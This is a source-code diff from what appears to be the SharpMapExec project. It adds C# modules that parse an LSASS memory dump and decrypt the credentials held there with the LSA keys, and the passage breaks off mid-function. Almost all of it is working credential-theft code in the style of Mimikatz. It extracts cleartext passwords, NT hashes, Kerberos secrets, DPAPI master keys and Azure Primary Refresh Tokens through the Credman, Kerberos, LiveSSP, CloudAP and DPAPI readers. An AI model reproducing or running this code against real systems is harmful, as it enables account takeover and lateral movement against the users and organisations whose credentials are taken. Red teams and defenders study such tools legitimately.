14	+	public static int FindCredentials(Program.MiniDump minidump, cloudap.CloudapTemplate template)
15	+	{
16	+	wdigest.KIWI_WDIGEST_LIST_ENTRY entry;
17	+	long logSessListAddr;
18	+	long llCurrent;
19	+
20	+	long position = find_signature(minidump, "cloudAP.dll", template.signature);
21	+	if (position == 0)
22	+	return 0;
23	+
24	+	var ptr_entry_loc = get_ptr_with_offset(minidump.fileBinaryReader, (position + template.first_entry_offset), minidump.sysinfo);
25	+	var ptr_entry = ReadUInt64(minidump.fileBinaryReader, (long)ptr_entry_loc);
26	+
27	+	llCurrent = (long)ptr_entry;
28	+	long stop = ReadInt64(minidump.fileBinaryReader, Rva2offset(minidump, llCurrent + 8));
29	+
30	+	do
31	+	{
32	+	logSessListAddr = Rva2offset(minidump, llCurrent);
33	+	byte[] Bytes = ReadBytes(minidump.fileBinaryReader, logSessListAddr, Marshal.SizeOf(typeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)));
34	+	var log = ReadStruct<KIWI_CLOUDAP_LOGON_LIST_ENTRY>(Bytes);
35	+	LUID luid = log.LocallyUniqueIdentifier;
36	+	//PrintProperties(log);
37	+
38	+	byte[] entryBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, log.cacheEntry), Marshal.SizeOf(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)));
39	+	KIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry = ReadStruct<KIWI_CLOUDAP_CACHE_LIST_ENTRY>(entryBytes);
40	+	string cachedir = Encoding.Unicode.GetString(cacheEntry.toname);
41	+	//PrintProperties(cacheEntry);
42	+
43	+	Cloudap cloudapentry = new Cloudap();
44	+	cloudapentry.cachedir = cachedir;
45	+
46	+	if (cacheEntry.cbPRT != 0 && cacheEntry.PRT != 0)
47	+	{
48	+	byte[] prtBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, (long)cacheEntry.PRT), (int)cacheEntry.cbPRT);
49	+	var DecryptedPRTBytes = BCrypt.DecryptCredentials(prtBytes, minidump.lsakeys);
50	+	string PRT = Encoding.ASCII.GetString(DecryptedPRTBytes.Skip(25).ToArray());
51	+
52	+	cloudapentry.PRT = PRT;
53	+	}
54	+
55	+	if (cacheEntry.toDetermine != 0)
56	+	{
57	+	byte[] cacheunkBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, (long)cacheEntry.toDetermine), Marshal.SizeOf(typeof(KIWI_CLOUDAP_CACHE_UNK)));
58	+	KIWI_CLOUDAP_CACHE_UNK cacheunk = ReadStruct<KIWI_CLOUDAP_CACHE_UNK>(cacheunkBytes);
59	+	var DecryptedDpapiBytes = BCrypt.DecryptCredentials(cacheunk.unk, minidump.lsakeys);
60	+
61	+	string key_guid = cacheunk.guid.ToString();
62	+	string dpapi_key = BitConverter.ToString(DecryptedDpapiBytes).Replace("-", "");
63	+	string dpapi_key_sha1 = BCrypt.GetHashSHA1(DecryptedDpapiBytes);
64	+
65	+	cloudapentry.key_guid = key_guid;
66	+	cloudapentry.dpapi_key = dpapi_key;
67	+	cloudapentry.dpapi_key_sha = dpapi_key_sha1;
68	+	}
69	+
70	+	var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
71	+	if (currentlogon == null)
72	+	{
73	+	currentlogon = new Logon(luid)
74	+	{
75	+	//UserName = username,
76	+	Cloudap = new List<Cloudap>()
77	+	};
78	+	currentlogon.Cloudap.Add(cloudapentry);
79	+	minidump.logonlist.Add(currentlogon);
80	+	}
81	+	else
82	+	{
83	+	currentlogon.Cloudap = new List<Cloudap>();
84	+	currentlogon.Cloudap.Add(cloudapentry);
85	+	}
86	+
87	+	llCurrent = log.Flink;
88	+	} while (llCurrent != stop);
89	+
90	+	return 0;
91	+	}
92	+	}
93	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Credman.cs

1	+	using Minidump.Crypto;
2	+	using Minidump.Templates;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.Linq;
6	+	using System.Runtime.InteropServices;
7	+	using System.Text;
8	+	using static Minidump.Helpers;
9	+
10	+	namespace Minidump.Decryptor
11	+	{
12	+	internal class Credman_
13	+	{
14	+	public static int FindCredentials(Program.MiniDump minidump, credman.CredmanTemplate template)
15	+	{
16	+	foreach (var logon in minidump.logonlist)
17	+	{
18	+	//Console.WriteLine("=======================");
19	+	var credmanMem = logon.pCredentialManager;
20	+	var luid = logon.LogonId;
21	+
22	+	long llCurrent;
23	+	var reference = 1;
24	+
25	+	minidump.fileBinaryReader.BaseStream.Seek(credmanMem, 0);
26	+	var credmansetBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(template.list_entry));
27	+
28	+	int list1offset = StructFieldOffset(typeof(KIWI_CREDMAN_SET_LIST_ENTRY), "list1");//bug
29	+	long pList1 = BitConverter.ToInt64(credmansetBytes, list1offset);
30	+	long refer = pList1 + FieldOffset<KIWI_CREDMAN_LIST_STARTER>("start");
31	+
32	+	minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, pList1), 0);
33	+	var credmanstarterBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_CREDMAN_LIST_STARTER)));
34	+
35	+	long pStart = BitConverter.ToInt64(credmanstarterBytes, FieldOffset<KIWI_CREDMAN_LIST_STARTER>("start"));
36	+
37	+	if (pStart == 0)
38	+	continue;
39	+
40	+	if (pStart == refer)
41	+	continue;
42	+
43	+	llCurrent = pStart;
44	+	llCurrent = llCurrent - FieldOffset<KIWI_CREDMAN_LIST_ENTRY>("Flink");
45	+
46	+	do
47	+	{
48	+	llCurrent = Rva2offset(minidump, llCurrent);
49	+	if (llCurrent == 0)
50	+	continue;
51	+
52	+	minidump.fileBinaryReader.BaseStream.Seek(llCurrent, 0);
53	+	var entryBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_CREDMAN_LIST_ENTRY)));
54	+	var entry = ReadStruct<KIWI_CREDMAN_LIST_ENTRY>(entryBytes);
55	+
56	+	var username = ExtractUnicodeStringString(minidump, entry.user);
57	+	var domain = ExtractUnicodeStringString(minidump, entry.server1);
58	+
59	+	var passDecrypted = "";
60	+
61	+	minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, (long)entry.encPassword), 0);
62	+
63	+	var msvPasswordBytes = minidump.fileBinaryReader.ReadBytes((int)entry.cbEncPassword);
64	+	var msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, minidump.lsakeys);
65	+
66	+	if (msvDecryptedPasswordBytes != null && msvDecryptedPasswordBytes.Length > 0)
67	+	{
68	+	var encoder = new UnicodeEncoding(false, false, true);
69	+	try
70	+	{
71	+	passDecrypted = encoder.GetString(msvDecryptedPasswordBytes);
72	+	}
73	+	catch (Exception)
74	+	{
75	+	passDecrypted = PrintHexBytes(msvDecryptedPasswordBytes);
76	+	}
77	+	}
78	+
79	+	if (!string.IsNullOrEmpty(username) && username.Length > 1)
80	+	{
81	+	CredMan credmanentry = new CredMan();
82	+	credmanentry.Reference = reference;
83	+	credmanentry.UserName = username;
84	+
85	+	if (!string.IsNullOrEmpty(domain))
86	+	credmanentry.DomainName = domain;
87	+	else
88	+	credmanentry.DomainName = "NULL";
89	+
90	+	if (!string.IsNullOrEmpty(passDecrypted))
91	+	credmanentry.Password = passDecrypted;
92	+	else
93	+	credmanentry.Password = "NULL";
94	+
95	+	if (credmanentry.Password != null)
96	+	{
97	+	var currentlogon = minidump.logonlist.FirstOrDefault(x =>
98	+	x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
99	+	if (currentlogon == null)
100	+	{
101	+	currentlogon = new Logon(luid);
102	+	currentlogon.UserName = username;
103	+	currentlogon.Credman = new List<CredMan>();
104	+	currentlogon.Credman.Add(credmanentry);
105	+	minidump.logonlist.Add(currentlogon);
106	+	}
107	+	else
108	+	{
109	+	if (currentlogon.Credman == null)
110	+	currentlogon.Credman = new List<CredMan>();
111	+
112	+	currentlogon.Credman.Add(credmanentry);
113	+	}
114	+	}
115	+	}
116	+	reference++;
117	+	llCurrent = entry.Flink;
118	+
119	+	} while (llCurrent != 0 && llCurrent != refer);
120	+	}
121	+
122	+	return 0;
123	+	}
124	+	}
125	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Dpapi_.cs

1	+	using Minidump.Crypto;
2	+	using Minidump.Templates;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.Linq;
6	+	using System.Runtime.InteropServices;
7	+	using static Minidump.Helpers;
8	+
9	+	namespace Minidump.Decryptor
10	+	{
11	+	public class Dpapi_
12	+	{
13	+	public static int FindCredentials(Program.MiniDump minidump, dpapi.DpapiTemplate template)
14	+	{
15	+	foreach (string module in new List<string> { "lsasrv.dll", "dpapisrv.dll" })
16	+	{
17	+	long position = find_signature(minidump, module, template.signature);
18	+	long llcurrent;
19	+	if (position == 0)
20	+	continue;
21	+
22	+	var ptr_entry_loc = get_ptr_with_offset(minidump.fileBinaryReader,
23	+	(position + template.first_entry_offset), minidump.sysinfo);
24	+	long ptr_entry = ReadInt64(minidump.fileBinaryReader, (long)ptr_entry_loc);
25	+
26	+	llcurrent = ptr_entry;
27	+	do
28	+	{
29	+	byte[] entryBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, llcurrent),
30	+	Marshal.SizeOf(typeof(dpapi.KIWI_MASTERKEY_CACHE_ENTRY)));
31	+
32	+	dpapi.KIWI_MASTERKEY_CACHE_ENTRY dpapiEntry = ReadStruct<dpapi.KIWI_MASTERKEY_CACHE_ENTRY>(entryBytes);
33	+	//PrintProperties(dpapiEntry);
34	+
35	+	byte[] dec_masterkey = BCrypt.DecryptCredentials(dpapiEntry.key, minidump.lsakeys);
36	+	Dpapi dpapi = new Dpapi();
37	+	//dpapi.luid = $"{dpapiEntry.LogonId.HighPart}:{dpapiEntry.LogonId.LowPart}";
38	+	dpapi.masterkey = BitConverter.ToString(dec_masterkey).Replace("-", "");
39	+	dpapi.insertTime = $"{ToDateTime(dpapiEntry.insertTime):yyyy-MM-dd HH:mm:ss}";
40	+	dpapi.key_size = dpapiEntry.keySize.ToString();
41	+	dpapi.key_guid = dpapiEntry.KeyUid.ToString();
42	+	dpapi.masterkey_sha = BCrypt.GetHashSHA1(dec_masterkey);
43	+
44	+	Logon currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == dpapiEntry.LogonId.HighPart && x.LogonId.LowPart == dpapiEntry.LogonId.LowPart);
45	+
46	+	if (dpapiEntry.keySize > 1)
47	+	{
48	+	if (currentlogon == null)
49	+	{
50	+	currentlogon = new Logon(dpapiEntry.LogonId);
51	+	//currentlogon.UserName = username;
52	+	currentlogon.Dpapi = new List<Dpapi>();
53	+	currentlogon.Dpapi.Add(dpapi);
54	+	minidump.logonlist.Add(currentlogon);
55	+	}
56	+	else
57	+	{
58	+	if (currentlogon.Dpapi == null)
59	+	currentlogon.Dpapi = new List<Dpapi>();
60	+
61	+	currentlogon.Dpapi.Add(dpapi);
62	+	}
63	+	}
64	+
65	+	llcurrent = dpapiEntry.Flink;
66	+	} while (llcurrent != ptr_entry);
67	+	}
68	+
69	+	return 0;
70	+	}
71	+	}
72	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/KerberosSessions.cs

1	+	using Minidump.Templates;
2	+	using System;
3	+	using System.Collections.Generic;
4	+	using System.Runtime.InteropServices;
5	+	using static Minidump.Helpers;
6	+
7	+	namespace Minidump.Decryptor
8	+	{
9	+	public class KerberosSessions
10	+	{
11	+	public static List<KerberosLogonItem> FindSessions(Program.MiniDump minidump, kerberos.KerberosTemplate template)
12	+	{
13	+	var klogonlist = new List<KerberosLogonItem>();
14	+
15	+	long position = find_signature(minidump, "kerberos.dll", template.signature);
16	+	if (position == 0)
17	+	{
18	+	Console.WriteLine("[x] Error: Could not find KerberosSessionList signature\n");
19	+	return klogonlist;
20	+	}
21	+	var ptr_entry_loc = get_ptr_with_offset(minidump.fileBinaryReader, (position + template.first_entry_offset), minidump.sysinfo);
22	+	var ptr_entry = Minidump.Helpers.ReadUInt64(minidump.fileBinaryReader, (long)ptr_entry_loc);
23	+	//long kerbUnloadLogonSessionTableAddr = Rva2offset(minidump, (long)ptr_entry);
24	+	//minidump.fileBinaryReader.BaseStream.Seek(kerbUnloadLogonSessionTableAddr, 0);
25	+
26	+	//Console.WriteLine("Parsing kerberos sessions");
27	+	WalkAVLTables(minidump, (long)ptr_entry, klogonlist, template);
28	+
29	+	return klogonlist;
30	+	}
31	+
32	+	private static void WalkAVLTables(Program.MiniDump minidump, long kerbUnloadLogonSessionTableAddr, List<KerberosLogonItem> klogonlist, kerberos.KerberosTemplate template)
33	+	{
34	+	if (kerbUnloadLogonSessionTableAddr == 0)
35	+	return;
36	+
37	+	kerbUnloadLogonSessionTableAddr = Rva2offset(minidump, kerbUnloadLogonSessionTableAddr);
38	+	minidump.fileBinaryReader.BaseStream.Seek(kerbUnloadLogonSessionTableAddr, 0);
39	+
40	+	var entryBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(kerberos.RTL_AVL_TABLE)));
41	+	var entry = ReadStruct<kerberos.RTL_AVL_TABLE>(entryBytes);
42	+
43	+	//Minidump.Helpers.PrintProperties(entry);
44	+
45	+	if (entry.OrderedPointer != 0)
46	+	{
47	+	var item = new KerberosLogonItem();
48	+	long address = Rva2offset(minidump, entry.OrderedPointer);
49	+	minidump.fileBinaryReader.BaseStream.Seek(address, 0);
50	+
51	+	item.LogonSessionAddress = address;
52	+	item.LogonSessionBytes = minidump.fileBinaryReader.ReadBytes(template.LogonSessionTypeSize);
53	+	klogonlist.Add(item);
54	+	//Minidump.Helpers.PrintProperties(item);
55	+	}
56	+
57	+	if (entry.BalancedRoot.RightChild != 0)
58	+	WalkAVLTables(minidump, entry.BalancedRoot.RightChild, klogonlist, template);
59	+	if (entry.BalancedRoot.LeftChild != 0)
60	+	WalkAVLTables(minidump, entry.BalancedRoot.LeftChild, klogonlist, template);
61	+	}
62	+
63	+	public class KerberosLogonItem
64	+	{
65	+	public long LogonSessionAddress { get; set; }
66	+	public byte[] LogonSessionBytes { get; set; }
67	+	}
68	+	}
69	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Kerberos_.cs

1	+	using Minidump.Crypto;
2	+	using Minidump.Templates;
3	+	using System;
4	+	using System.Linq;
5	+	using System.Runtime.InteropServices;
6	+	using System.Security.Cryptography;
7	+	using System.Text;
8	+	using static Minidump.Helpers;
9	+
10	+	namespace Minidump.Decryptor
11	+	{
12	+	internal class Kerberos_
13	+	{
14	+	public static void FindCredentials(Program.MiniDump minidump, kerberos.KerberosTemplate template)
15	+	{
16	+	foreach (KerberosSessions.KerberosLogonItem entry in minidump.klogonlist)
17	+	{
18	+	if (entry == null)
19	+	continue;
20	+
21	+	var luid = ReadStruct<LUID>(GetBytes(entry.LogonSessionBytes, 72, Marshal.SizeOf(typeof(LUID))));
22	+
23	+	var usUserName = ReadStruct<UNICODE_STRING>(GetBytes(entry.LogonSessionBytes, template.SessionCredentialOffset + template.SessionUserNameOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
24	+	var usDomain = ReadStruct<UNICODE_STRING>(GetBytes(entry.LogonSessionBytes, template.SessionCredentialOffset + template.SessionDomainOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
25	+	var usPassword = ReadStruct<UNICODE_STRING>(GetBytes(entry.LogonSessionBytes, template.SessionCredentialOffset + template.SessionPasswordOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
26	+
27	+	var username = ExtractUnicodeStringString(minidump, usUserName);
28	+	var domain = ExtractUnicodeStringString(minidump, usDomain);
29	+
30	+	minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, usPassword.Buffer), 0);
31	+	byte[] msvPasswordBytes = minidump.fileBinaryReader.ReadBytes(usPassword.MaximumLength);
32	+
33	+	var msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, minidump.lsakeys);
34	+
35	+	var passDecrypted = "";
36	+	var encoder = new UnicodeEncoding(false, false, true);
37	+	try
38	+	{
39	+	passDecrypted = encoder.GetString(msvDecryptedPasswordBytes);
40	+	}
41	+	catch (Exception)
42	+	{
43	+	passDecrypted = PrintHexBytes(msvDecryptedPasswordBytes);
44	+	}
45	+	//passDecrypted = Convert.ToBase64String(msvDecryptedPasswordBytes);
46	+
47	+	if (!string.IsNullOrEmpty(username) && username.Length > 1)
48	+	{
49	+	if (msvDecryptedPasswordBytes.Length <= 1)
50	+	continue;
51	+
52	+	var krbrentry = new Kerberos();
53	+	krbrentry.UserName = username;
54	+
55	+	if (krbrentry.UserName.Contains("$"))
56	+	{
57	+	try
58	+	{
59	+	krbrentry.NT = msvDecryptedPasswordBytes.MD4().AsHexString();
60	+	}
61	+	catch
62	+	{
63	+	krbrentry.NT = "NULL";
64	+	}
65	+	}
66	+
67	+	if (!string.IsNullOrEmpty(domain))
68	+	krbrentry.DomainName = domain;
69	+	else
70	+	krbrentry.DomainName = "NULL";
71	+
72	+	if (!string.IsNullOrEmpty(passDecrypted))
73	+	krbrentry.Password = passDecrypted;
74	+	else
75	+	krbrentry.Password = "NULL";
76	+
77	+	var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
78	+	if (currentlogon == null)
79	+	{
80	+	currentlogon = new Logon(luid);
81	+	currentlogon.UserName = username;
82	+	currentlogon.Kerberos = krbrentry;
83	+	minidump.logonlist.Add(currentlogon);
84	+	}
85	+	else
86	+	{
87	+	currentlogon.Kerberos = krbrentry;
88	+	}
89	+	}
90	+	}
91	+	}
92	+	}
93	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/LiveSsp_.cs

1	+	using Minidump.Crypto;
2	+	using Minidump.Templates;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.Linq;
6	+	using System.Runtime.InteropServices;
7	+	using System.Security.Cryptography;
8	+	using System.Text;
9	+	using static Minidump.Helpers;
10	+	using static Minidump.Templates.livessp;
11	+
12	+	namespace Minidump.Decryptor
13	+	{
14	+	internal class LiveSsp_
15	+	{
16	+	public static int FindCredentials(Program.MiniDump minidump, LiveSspTemplate template)
17	+	{
18	+	KIWI_LIVESSP_LIST_ENTRY entry;
19	+	string passDecrypted = "";
20	+	long llCurrent;
21	+	long sspCredentialListAddr;
22	+
23	+	//Console.WriteLine(Helpers.ByteArrayToString(template.signature));
24	+	//foreach (var VARIABLE in minidump.modules)
25	+	//{
26	+	// Console.WriteLine(VARIABLE.name);
27	+	//}
28	+	long position = find_signature(minidump, "msv1_0.dll", template.signature);
29	+	if (position == 0)
30	+	return 0;
31	+
32	+	long ptr_entry_loc = (long)get_ptr_with_offset(minidump.fileBinaryReader, (position + template.first_entry_offset), minidump.sysinfo);
33	+	sspCredentialListAddr = ReadInt64(minidump.fileBinaryReader, (long)ptr_entry_loc);
34	+	//sspCredentialListAddr = Rva2offset(minidump, ptr_entry);
35	+
36	+	llCurrent = sspCredentialListAddr;
37	+
38	+	do
39	+	{
40	+	Console.WriteLine(llCurrent);
41	+	llCurrent = Rva2offset(minidump, llCurrent);
42	+	//Console.WriteLine(llCurrent);
43	+	minidump.fileBinaryReader.BaseStream.Seek(llCurrent, 0);
44	+
45	+	byte[] entryBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_LIVESSP_LIST_ENTRY)));
46	+	entry = ReadStruct<KIWI_LIVESSP_LIST_ENTRY>(entryBytes);
47	+
48	+	string username = ExtractUnicodeStringString(minidump, entry.suppCreds.credentials.UserName);
49	+	string domain = ExtractUnicodeStringString(minidump, entry.suppCreds.credentials.Domain);
50	+
51	+	minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, entry.suppCreds.credentials.Password.Buffer), 0);
52	+	byte[] msvPasswordBytes = minidump.fileBinaryReader.ReadBytes(entry.suppCreds.credentials.Password.MaximumLength);
53	+	byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, minidump.lsakeys);
54	+
55	+	passDecrypted = Encoding.Unicode.GetString(msvDecryptedPasswordBytes);
56	+
57	+	/*Console.WriteLine("LUID " + entry.LogonId.LowPart);
58	+	Console.WriteLine("References " + entry.References);
59	+	Console.WriteLine("CredentialReferences " + entry.CredentialReferences);
60	+	Console.WriteLine("Uusername {1} {0}", username, entry.credentials.UserName.MaximumLength);
61	+	Console.WriteLine("Udomain {1} {0}", domain, entry.credentials.Domaine.MaximumLength);
62	+	Console.WriteLine("Upassword {1} {0}", passDecrypted, entry.credentials.Password.MaximumLength);*/
63	+	if (!string.IsNullOrEmpty(username) && username.Length > 1)
64	+	{
65	+	LUID luid = entry.LocallyUniqueIdentifier;
66	+
67	+	LiveSsp sspentry = new LiveSsp();
68	+	sspentry.UserName = username;
69	+
70	+	if (!string.IsNullOrEmpty(domain))
71	+	{
72	+	sspentry.DomainName = domain;
73	+	}
74	+	else
75	+	{
76	+	sspentry.DomainName = "NULL";
77	+	}
78	+
79	+	if (!string.IsNullOrEmpty(passDecrypted))
80	+	{
81	+	sspentry.Password = passDecrypted;
82	+	}
83	+	else
84	+	{
85	+	sspentry.Password = "NULL";
86	+	}
87	+
88	+	try
89	+	{
90	+	sspentry.NT = msvDecryptedPasswordBytes.MD4().AsHexString();
91	+	}
92	+	catch
93	+	{
94	+	sspentry.NT = "NULL";
95	+	}
96	+
97	+	if (sspentry.Password != "NULL")
98	+	{
99	+	Logon currentlogon = minidump.logonlist.FirstOrDefault(x =>
100	+	x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
101	+	if (currentlogon == null)
102	+	{
103	+	currentlogon = new Logon(luid);
104	+	currentlogon.UserName = username;
105	+	currentlogon.LiveSsp = new List<LiveSsp>();
106	+	currentlogon.LiveSsp.Add(sspentry);
107	+	minidump.logonlist.Add(currentlogon);
108	+	}
109	+	else
110	+	{
111	+	if (currentlogon.LiveSsp == null)
112	+	currentlogon.LiveSsp = new List<LiveSsp>();
113	+
114	+	currentlogon.LiveSsp.Add(sspentry);
115	+	}
116	+	}
117	+	}
118	+
119	+	llCurrent = entry.Flink;
120	+	} while (llCurrent != sspCredentialListAddr);
121	+
122	+	return 0;
123	+	}
124	+	}
125	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/LogonSessions.cs

1	+	using Minidump.Templates;
2	+	using System;
3	+	using System.Collections.Generic;
4	+	using System.Runtime.InteropServices;
5	+	using static Minidump.Helpers;
6	+
7	+	namespace Minidump.Decryptor
8	+	{
9	+	public class Logon
10	+	{
11	+	public Logon(LUID logonId)
12	+	{
13	+	LogonId = logonId;
14	+	}
15	+
16	+	public LUID LogonId { get; set; }
17	+	public string LogonType { get; set; }
18	+	public int Session { get; set; }
19	+	public FILETIME LogonTime { get; set; }
20	+	public string UserName { get; set; }
21	+	public string LogonDomain { get; set; }
22	+	public string LogonServer { get; set; }
23	+	public string SID { get; set; }
24	+
25	+	public Msv Msv { get; set; }
26	+	public Kerberos Kerberos { get; set; }
27	+	public List<Tspkg> Tspkg { get; set; }
28	+	public List<WDigest> Wdigest { get; set; }
29	+	public List<Ssp> Ssp { get; set; }
30	+	public List<LiveSsp> LiveSsp { get; set; }
31	+	public List<CredMan> Credman { get; set; }
32	+	public List<KerberosKey> KerberosKeys { get; set; }
33	+	public List<Cloudap> Cloudap { get; set; }
34	+	public List<Dpapi> Dpapi { get; set; }
35	+	public List<Rdp> Rdp { get; set; }
36	+
37	+	public long pCredentials { get; set; }
38	+	public long pCredentialManager { get; set; }
39	+	}
40	+
41	+	public class Cloudap
42	+	{
43	+	public string luid { get; set; }
44	+	public string sid { get; set; }
45	+	public string cachedir { get; set; }
46	+	public string PRT { get; set; }
47	+	public string key_guid { get; set; }
48	+	public string dpapi_key { get; set; }
49	+	public string dpapi_key_sha { get; set; }
50	+	}
51	+
52	+	public class Dpapi
53	+	{
54	+	public string luid { get; set; }
55	+	public string key_guid { get; set; }
56	+	public string masterkey { get; set; }
57	+	public string masterkey_sha { get; set; }
58	+	public string insertTime { get; set; }
59	+	public string key_size { get; set; }
60	+	}
61	+
62	+	public class Msv
63	+	{
64	+	public string DomainName { get; set; }
65	+	public string UserName { get; set; }
66	+	public string Lm { get; set; }
67	+	public string NT { get; set; }
68	+	public string Sha1 { get; set; }
69	+	public string Dpapi { get; set; }
70	+	}
71	+
72	+	public class Ssp
73	+	{
74	+	//public int Reference { get; set; }
75	+	public string DomainName { get; set; }
76	+
77	+	public string UserName { get; set; }
78	+	public string Password { get; set; }
79	+	public string NT { get; set; }
80	+	}
81	+
82	+	public class Rdp
83	+	{
84	+	public string DomainName { get; set; }
85	+	public string UserName { get; set; }
86	+	public string Password { get; set; }
87	+	public string Password_raw { get; set; }
88	+	public string NT { get; set; }
89	+	}
90	+
91	+	public class LiveSsp
92	+	{
93	+	public int Reference { get; set; }
94	+	public string DomainName { get; set; }
95	+	public string UserName { get; set; }
96	+	public string Password { get; set; }
97	+	public string NT { get; set; }
98	+	}
99	+
100	+	public class Tspkg
101	+	{
102	+	public string DomainName { get; set; }
103	+	public string UserName { get; set; }
104	+	public string Password { get; set; }
105	+	public string NT { get; set; }
106	+	}
107	+
108	+	public class Kerberos
109	+	{
110	+	public string DomainName { get; set; }
111	+	public string UserName { get; set; }
112	+	public string Password { get; set; }
113	+	public string NT { get; set; }
114	+	}
115	+
116	+	public class CredMan
117	+	{
118	+	public int Reference { get; set; }
119	+	public string DomainName { get; set; }
120	+	public string UserName { get; set; }
121	+	public string Password { get; set; }
122	+	public string NT { get; set; }
123	+	}
124	+
125	+	public class WDigest
126	+	{
127	+	public string HostName { get; set; }
128	+	public string UserName { get; set; }
129	+	public string Password { get; set; }
130	+	public string NT { get; set; }
131	+	}
132	+
133	+	public class KerberosKey
134	+	{
135	+	public string Type { get; set; }
136	+	public string Key { get; set; }
137	+	}
138	+
139	+	internal class LogonSessions
140	+	{
141	+	private static readonly long max_search_size = 580000;
142	+
143	+	private static readonly string[] KUHL_M_SEKURLSA_LOGON_TYPE =
144	+	{
145	+	"UndefinedLogonType",
146	+	"Unknown !",
147	+	"Interactive",
148	+	"Network",
149	+	"Batch",
150	+	"Service",
151	+	"Proxy",
152	+	"Unlock",
153	+	"NetworkCleartext",
154	+	"NewCredentials",
155	+	"RemoteInteractive",
156	+	"CachedInteractive",
157	+	"CachedRemoteInteractive",
158	+	"CachedUnlock"
159	+	};
160	+
161	+	public static List<Logon> FindSessions(Program.MiniDump minidump, msv.MsvTemplate template)
162	+	{
163	+	//Minidump.PrintProperties(template);
164	+
165	+	List<Logon> logonlist = new List<Logon>();
166	+	List<long> offsetlist = new List<long>();
167	+
168	+	long logonSessionListSignOffset = find_signature(minidump, "lsasrv.dll", template.signature);
169	+	if (logonSessionListSignOffset == 0)
170	+	{
171	+	Console.WriteLine("[x] Error: Could not find LogonSessionList signature\n");
172	+	return logonlist;
173	+	}
174	+
175	+	long logonSessionOffset = (long)get_ptr_with_offset(minidump.fileBinaryReader, (logonSessionListSignOffset + template.LogonSessionListCountOffset), minidump.sysinfo);
176	+	int logonSessionListCount = ReadInt32(minidump.fileBinaryReader, logonSessionOffset);
177	+
178	+	//Console.WriteLine($"Parsing {logonSessionListCount} logon sessions");
179	+	for (var i = 0; i < logonSessionListCount; i++)
180	+	{
181	+	//Console.WriteLine($"Parsing session {i}");
182	+	long offset = logonSessionListSignOffset + template.first_entry_offset;
183	+	long listMemOffset = ReadInt32(minidump.fileBinaryReader, offset);
184	+	long tmp_offset = (int)offset + sizeof(int) + (int)listMemOffset + (16 * i);
185	+	var voffset = ReadInt64(minidump.fileBinaryReader, tmp_offset);
186	+	long current = Rva2offset(minidump, voffset);
187	+
188	+	do
189	+	{
190	+	long listentry = ReadInt64(minidump.fileBinaryReader, current);
191	+	listentry = Rva2offset(minidump, listentry);
192	+
193	+	if (listentry == 0)
194	+	break;
195	+	if (offsetlist.Contains((listentry + template.LocallyUniqueIdentifierOffset)))
196	+	{
197	+	break;
198	+	}
199	+
200	+	KIWI_BASIC_SECURITY_LOGON_SESSION_DATA logonsession = new KIWI_BASIC_SECURITY_LOGON_SESSION_DATA();
201	+
202	+	offsetlist.Add(listentry + template.LocallyUniqueIdentifierOffset);
203	+	logonsession.LogonId = listentry + template.LocallyUniqueIdentifierOffset;
204	+	logonsession.LogonType = ReadInt32(minidump.fileBinaryReader, listentry + template.LogonTypeOffset);
205	+	logonsession.Session = ReadInt32(minidump.fileBinaryReader, listentry + template.SessionOffset);
206	+	logonsession.LogonTime = ReadStruct<FILETIME>(ReadBytes(minidump.fileBinaryReader, listentry + template.LogonTimeOffset + 4, 8));
207	+	//p* for pointers
208	+	logonsession.pCredentials = ReadInt64(minidump.fileBinaryReader, listentry + template.CredentialsOffset);
209	+	logonsession.pCredentialManager = ReadInt64(minidump.fileBinaryReader, listentry + template.CredentialManagerOffset);
210	+	logonsession.pSid = listentry + template.pSidOffset;
211	+
212	+	var luid = ReadStruct<LUID>(ReadBytes(minidump.fileBinaryReader, logonsession.LogonId, 4));
213	+
214	+	minidump.fileBinaryReader.BaseStream.Seek(listentry + template.UserNameListOffset, 0);
215	+	logonsession.UserName =
216	+	ExtractUnicodeStringString(minidump,
217	+	ExtractUnicodeString(minidump.fileBinaryReader));
218	+
